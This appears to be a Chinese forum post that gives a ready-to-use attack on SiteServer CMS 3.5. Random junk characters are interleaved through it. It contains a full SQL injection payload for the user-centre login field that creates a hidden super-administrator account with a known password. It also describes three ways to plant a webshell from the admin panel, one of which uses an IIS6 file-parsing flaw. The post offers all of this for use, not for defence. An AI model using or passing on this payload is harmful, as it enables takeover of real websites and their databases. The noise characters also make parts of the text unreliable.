经测试秒杀最新的3.5版3 ]; T& n, h F) H4 Q+ j; v z
* x. I) h" H6 b1 Dstieserver官网:www.siteserver.cn
) S! H9 B% K; g' V, f3 W7 |; m( E' b1 L9 s% J4 ^) {8 ~ ]) y
% }+ d* E% Y0 S9 {; O3 Q6 o2 `# n: ]* P& F8 @# y0 ~% a
EXP: i) ^% c, ?' f5 ?6 c' f4 u4 e' p) `
2 t4 Q) W/ _) \" |2 z9 M$ N: D直接访问UserCenter/login.aspx
3 S) v& b2 w% |" x D" q" g/ I7 U: f1 a( F0 u4 h# K1 {7 [) q7 ?
2 ^% B% D6 b! J% p9 h9 Q. {
c m6 N+ m1 d0 R9 a* H/ _用户名处输入:
) [0 J7 q5 a! ?+ ~
, L4 L, c: o1 v, U" D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
' x1 a* i9 a( |( P9 y4 ^5 f) d n$ y! Q+ ` O
1 ^7 {! W9 {% y; Z9 ?9 ^
7 K! N/ R$ u- U3 p" e5 } I密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
8 @2 J' \" q3 K6 w" i# z# i# \0 X8 o6 F7 \5 ^
9 Z% e1 k7 H- D( L6 D8 }2 L4 {2 [. G
之后再访问后台SiteServer/login.aspx用插入的用户登陆: j% A( J9 A7 I. t# N% o. y
! y( {: I0 K: D; a2 `1 y2 Q1 w
# o# A$ J/ a/ x- N
- w }4 Q; S6 A6 ?后台拿webshell的三种方法:6 l3 G2 @) a7 i2 h/ b; X; E. U! X: n
4 E f' F% \- }
一、# V/ _; x: z) K, }
0 f6 Y0 L: ` P4 p2 q+ f. u5 s! @站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 t8 |( @: @7 V1 T6 O3 a1 B) ~+ O" ] Z( I! }9 t7 W
二、2 t+ B+ Q- L* S/ s; L3 ]" @- k
5 T( A+ w9 ]0 t5 B# y. ~( T成员权限-》添加用户-》用户名为:1.asp
8 [. @, H7 U) [' Z- w7 k4 q3 Z6 s$ W8 r# D$ e8 N5 B( F
http://127.0.0.1/usercenter/$ A' K% c& Z4 ~5 C5 f% L( z, I" z
# N# {9 Q$ ~; F; I8 x用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
+ a- j: [/ r1 l( j% F: I% J; C7 R5 q3 I" P
(ps:后台添加用户时不会验证是否含有非法字符)! {6 _1 M I% Z. m8 G% V
8 @/ O0 Y% d) O6 ] m% v5 J5 ` T三、
, r8 n/ R7 l6 G+ z
/ ?) [+ U$ P" S5 O4 F \& ~系统工具-》实用工具-》机器参数查看
/ U' w1 E/ G ^% w可以看到数据库类型、名称,WEB路径0 V8 ?6 ?5 O4 e- t/ v/ k9 a
& i& ^7 Z& I0 Z) j
系统工具-》数据库工具-》SQL语句查询
: N/ Q! R% K5 p( h- ?) S6 X( g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。2 X, M8 Y. C) s1 u( e0 C( {
2 K% q; L9 `3 x% p+ E. N) \ |